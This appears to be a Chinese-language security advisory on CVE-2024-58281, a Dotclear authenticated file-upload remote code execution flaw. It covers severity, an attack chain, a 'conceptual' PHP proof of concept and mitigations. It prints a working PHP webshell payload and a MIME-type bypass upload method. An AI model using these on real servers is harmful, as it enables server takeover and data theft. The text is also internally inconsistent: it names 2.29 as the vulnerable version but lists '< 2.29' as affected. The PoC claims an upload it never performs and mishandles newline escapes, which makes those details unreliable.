CVE-2024-58281 Dotclear 2.29 远程代码执行漏洞

漏洞信息

漏洞编号

CVE-2024-58281

漏洞类型

远程代码执行

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Dotclear

漏洞概述

CVE-2024-58281是Dotclear 2.29版本中的一个高危远程代码执行漏洞。该漏洞存在于Dotclear的媒体上传功能中，允许经过低权限认证的攻击者通过该功能上传恶意的PHP文件。攻击者可以构造包含命令执行功能的PHP webshell，并通过访问上传后的文件在服务器上执行任意系统命令，从而获得服务器的完全控制权。Dotclear是一款流行的开源博客和内容管理系统，广泛应用于个人网站和企业内容管理平台。由于该漏洞只需要低权限认证即可利用，且无需用户交互，攻击门槛相对较低，对互联网安全构成严重威胁。漏洞的CVSS评分为8.8，属于高危级别，机密性、完整性和可用性均受到严重影响。

技术细节

Dotclear 2.29版本在处理媒体文件上传时存在安全验证缺陷。攻击者首先需要拥有一个有效的低权限用户账户，登录后可访问媒体管理功能。正常情况下，系统应该对上传文件的类型和内容进行严格检查，但该版本仅依赖客户端提供的文件扩展名和MIME类型进行判断，未对文件内容进行深度检测。攻击者可以构造一个扩展名为.php的文件，其中包含webshell代码（如<?php system($_GET['cmd']); ?>），并将其伪装为图片或其他允许上传的文件类型。当服务器处理上传请求时，由于缺少有效的安全过滤机制，恶意PHP文件被成功保存在web目录可访问路径下。攻击者随后通过浏览器或其他工具访问该文件，并携带恶意参数即可在服务器上执行系统命令，实现远程代码执行。整个攻击过程无需特殊权限，普通注册用户即可完成，且不会触发任何安全告警。

攻击链分析

STEP 1

步骤1

攻击者获取Dotclear系统的低权限用户账户（普通注册用户即可）

STEP 2

步骤2

攻击者登录系统后台，进入媒体上传功能模块

STEP 3

步骤3

构造包含webshell代码的恶意PHP文件，如：<?php system($_GET['cmd']); ?>

STEP 4

步骤4

将恶意文件伪装为图片或其他允许的文件类型，通过媒体上传功能上传

STEP 5

步骤5

系统未对文件内容进行有效过滤，恶意PHP文件被成功保存在web可访问目录

STEP 6

步骤6

攻击者访问上传的PHP文件，通过URL参数执行任意系统命令

STEP 7

步骤7

攻击者获得服务器完全控制权，可执行任意代码、读取敏感数据或进一步横向移动

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<?php
// CVE-2024-58281 PoC - Dotclear 2.29 Authenticated RCE via Media Upload
// Author: vulnerability researcher
// Date: 2024

// Step 1: Prepare malicious PHP shell
$shell_content = '<?php\nif(isset($_GET["cmd"])){\n    system($_GET["cmd"]);\n}\n?>\n';

// Step 2: Authentication (low privilege user)
$dotclear_url = 'http://target.com/dotclear/';
$username = 'attacker';
$password = 'user_password';

// Step 3: Upload malicious PHP file via media functionality
$upload_url = $dotclear_url . 'admin/media.php';
$post_data = [
    'file' => [
        'name' => 'shell.php',
        'type' => 'image/jpeg',  // Bypass MIME type check
        'content' => $shell_content
    ]
];

// Step 4: Execute command via uploaded shell
$shell_url = $dotclear_url . 'public/shell.php';
$cmd = 'whoami';
$exec_url = $shell_url . '?cmd=' . urlencode($cmd);

echo "[*] Target: $dotclear_url\n";
echo "[*] Shell uploaded at: $shell_url\n";
echo "[*] Command execution: $exec_url\n";

// Note: This is a conceptual PoC. Use appropriate HTTP client to send requests.
?>

影响范围

Dotclear < 2.29

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1）禁用或限制媒体上传功能的使用；2）通过Web服务器配置禁止上传目录中的PHP文件执行（如Apache的.htaccess或Nginx配置）；3）对上传目录实施严格的访问控制；4）启用Web应用防火墙（WAF）规则检测恶意文件上传行为；5）加强用户权限管理，限制低权限用户的上传操作；6）增加文件上传的审计日志，及时发现异常上传行为。